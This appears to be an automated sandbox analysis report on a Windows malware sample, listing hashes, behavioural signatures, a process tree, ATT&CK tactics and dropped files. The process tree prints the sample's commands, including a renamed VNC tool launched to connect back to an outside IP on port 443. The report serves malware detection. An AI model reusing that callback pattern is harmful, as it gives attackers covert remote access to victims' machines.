d60a4dfc2c48fd80957ee77ab0ec4221f67e3f92551c9c245292f56dbaf9912e

Analysis

max time kernel
149s
max time network
140s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10/04/2024, 14:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d60a4dfc2c48fd80957ee77ab0ec4221f67e3f92551c9c245292f56dbaf9912e.exe
Size

1.1MB
MD5

f76cce79e084cc19c3ce1cf5b4812ee7
SHA1

c6b4dc969b8ed41a4f599b06dee8f377d4329598
SHA256

d60a4dfc2c48fd80957ee77ab0ec4221f67e3f92551c9c245292f56dbaf9912e
SHA512

6d7a778457d04ae6bd54f9f6443a5389a24849409910d7af2e45d40e7f4d10c04dca89047263e55c3c6582f50e178fe206db89824ff88b9caa266e3a30b44df9
SSDEEP

24576:U1qUuBYcNXwdzrjSn3U9init/m6mlJSJvK70zD+UJTlO6PLq:U1qUujeunE9iit/9mlYJvW0z9TpW

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2916	bitadmins.exe
1876	bitadmins.exe

Loads dropped DLL 1 IoCs

pid	Process
2716	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
2508	timeout.exe
2632	timeout.exe
1656	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2424	taskkill.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2424	taskkill.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe
2916	bitadmins.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1712 wrote to memory of 2716	1712	d60a4dfc2c48fd80957ee77ab0ec4221f67e3f92551c9c245292f56dbaf9912e.exe	28
PID 1712 wrote to memory of 2716	1712	d60a4dfc2c48fd80957ee77ab0ec4221f67e3f92551c9c245292f56dbaf9912e.exe	28
PID 1712 wrote to memory of 2716	1712	d60a4dfc2c48fd80957ee77ab0ec4221f67e3f92551c9c245292f56dbaf9912e.exe	28
PID 1712 wrote to memory of 2716	1712	d60a4dfc2c48fd80957ee77ab0ec4221f67e3f92551c9c245292f56dbaf9912e.exe	28
PID 2716 wrote to memory of 2508	2716	cmd.exe	30
PID 2716 wrote to memory of 2508	2716	cmd.exe	30
PID 2716 wrote to memory of 2508	2716	cmd.exe	30
PID 2716 wrote to memory of 2508	2716	cmd.exe	30
PID 2716 wrote to memory of 2424	2716	cmd.exe	31
PID 2716 wrote to memory of 2424	2716	cmd.exe	31
PID 2716 wrote to memory of 2424	2716	cmd.exe	31
PID 2716 wrote to memory of 2424	2716	cmd.exe	31
PID 2716 wrote to memory of 2916	2716	cmd.exe	33
PID 2716 wrote to memory of 2916	2716	cmd.exe	33
PID 2716 wrote to memory of 2916	2716	cmd.exe	33
PID 2716 wrote to memory of 2916	2716	cmd.exe	33
PID 2716 wrote to memory of 2632	2716	cmd.exe	34
PID 2716 wrote to memory of 2632	2716	cmd.exe	34
PID 2716 wrote to memory of 2632	2716	cmd.exe	34
PID 2716 wrote to memory of 2632	2716	cmd.exe	34
PID 2716 wrote to memory of 1876	2716	cmd.exe	37
PID 2716 wrote to memory of 1876	2716	cmd.exe	37
PID 2716 wrote to memory of 1876	2716	cmd.exe	37
PID 2716 wrote to memory of 1876	2716	cmd.exe	37
PID 2716 wrote to memory of 1656	2716	cmd.exe	38
PID 2716 wrote to memory of 1656	2716	cmd.exe	38
PID 2716 wrote to memory of 1656	2716	cmd.exe	38
PID 2716 wrote to memory of 1656	2716	cmd.exe	38

C:\Users\Admin\AppData\Local\Temp\d60a4dfc2c48fd80957ee77ab0ec4221f67e3f92551c9c245292f56dbaf9912e.exe
"C:\Users\Admin\AppData\Local\Temp\d60a4dfc2c48fd80957ee77ab0ec4221f67e3f92551c9c245292f56dbaf9912e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1712
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Roaming\Ofice\O87414.bat" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 39
    3⤵
    - Delays execution with timeout.exe
    PID:2508
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im bitadmins.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
- - C:\Users\Admin\AppData\Roaming\Ofice\bitadmins.exe
    "C:\Users\Admin\AppData\Roaming\Ofice\bitadmins.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2916
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 12
    3⤵
    - Delays execution with timeout.exe
    PID:2632
- - C:\Users\Admin\AppData\Roaming\Ofice\bitadmins.exe
    "C:\Users\Admin\AppData\Roaming\Ofice\bitadmins.exe" -autoreconnect -id:12941 -connect 124.15.125.1:443
    3⤵
    - Executes dropped EXE
    PID:1876
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 8
    3⤵
    - Delays execution with timeout.exe
    PID:1656

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Ofice\MSRC4Plugin_for_sc.dsm

Filesize
62KB

MD5
44148da5da83a209fb49078f6223f4fd

SHA1
de89191bd36f9a4407a8103ee259f0e3c69a40f1

SHA256
30fefab225d9f3d5e60a63527220f697c1362366b47b526ad85c9e749c38f0de

SHA512
c46eb60da8075cd14d854f3cd167cd82c03d978b3b5e3646fbeacee90252b3cf5fe3d80235a5ec189d59994fd70848a09e26827da591fcfae3246079853fbb07

Download Submit
C:\Users\Admin\AppData\Roaming\Ofice\Nhoioao2oiotoHor.png

Filesize
163KB

MD5
ef0e1ae8dc921f82fda93b32e4dcd95d

SHA1
144edc856fde85c279d75649927fdab70113aea1

SHA256
11a739bd16a4fad7198c7512a610488bcad35a4e7889d3cf737378f4037a95a8

SHA512
6a2e240db32a7cccbcfe99ed7a12aecc6fc31d2d7eda1460c47b125203611e87018e88355c78b045b14d91c458fb3c655ca615ebac34a4fdc56eaf4bc1b5f0fe

Download Submit
C:\Users\Admin\AppData\Roaming\Ofice\O87414.bat

Filesize
622B

MD5
64dbeee34868e27b9cb24b1997fa2412

SHA1
642cf96d157f562fdbcd178cf12239695cca01df

SHA256
5440415c4a1702084a7c49b7024d0c75b9528b71d1faa4c744e95435dad6b533

SHA512
c1580c1575318f2543aa12942165deec8bea2efc8f30f432faca14e309e33770875cd2173f152792fe6ba9d98693e265a8c1cc83f12785e5f41fe02605bac219

Download Submit
C:\Users\Admin\AppData\Roaming\Ofice\UltraVNC.ini

Filesize
857B

MD5
a8b7229b55f865ec0c59ff0dcfe59e09

SHA1
8f0017b70fae57c72306d2cca88145762a9c91f1

SHA256
1e7728efa610aeeee579c5ba26abd438a6002690e593902af9c0d53ea36debf0

SHA512
c54550a477cf11ead92f93b48b3a77d75278e6f0212a89da794389802f6ae2cd08db56d3a1552251d439c45ea089642c8a601f132dbb836f6510a23212d5c287

Download Submit
C:\Users\Admin\AppData\Roaming\Ofice\WoIxICIyI5ItI6Io.png

Filesize
118KB

MD5
1989d95316a5be88b238b91d7616784a

SHA1
deca088b25d3327f3d0ea060489a28164359d961

SHA256
3399baea31e148d9e03e13896eec2a8072915dc2b713099d3134d484d2b9ed5e

SHA512
0460be6d4151501a47a56ba882100e53e07b1bbb71f712a29cad6a6426c458c6885aa40fcb5c9ed84ee717fc76feb56e3e2a6238c0897e246f938912ab6158a8

Download Submit
C:\Users\Admin\AppData\Roaming\Ofice\Y3hghShFhYhNhGhm.ini

Filesize
2.7MB

MD5
1291fb31409e7d3d0dfbde047f5591c4

SHA1
4efac78e2c3bceed1fb5ee49f012332e427fa028

SHA256
da089ab564cfe3befbe1505c7544927f4227628956bf18eeb5d04a7dc9f29f0d

SHA512
8f0cb81952e938eceb39988f8ecaf7c0c7608eec0240089843649a5413db6c7038dbcf2374fcf2969ff077afc183f75cc3c2d1d6097f25a88a5a1bb97ade3702

Download Submit
C:\Users\Admin\AppData\Roaming\Ofice\rc4.key

Filesize
87B

MD5
3a3bbdf24fb500bbd12dfe94ba84a007

SHA1
87f480995a2e1269878910c7697d602fc306625b

SHA256
3225058afbdf79b87d39a3be884291d7ba4ed6ec93d1c2010399e11962106d5b

SHA512
e6307dd02d104248c2d54132a6a509eb09d2e1bc722a57127d350dde8171a715b0a123ad28c8c44aa466e9e71e49fbcb8a13160ae2b58c3dba511968afae1c21

Download Submit
C:\Users\Admin\AppData\Roaming\Ofice\t5MCMWMjM6M4MRMC.png

Filesize
165KB

MD5
b2fe7c96b97274ba9aba439f78859e83

SHA1
ff934979517491314c64f4f990ee9afd5271e92c

SHA256
d3d6c64bc83c3fede4a228016bbb37b6124b239b83d930e56d69ebe028b384f4

SHA512
6247f2f812bf124e51ac86d3eb2bebf8725e4438cf0aef0c35c98a3f125c92b9643a1bb944d39f74238027f86772cbb9174ddd1132e19cb20c05d8e3efc998a6

Download Submit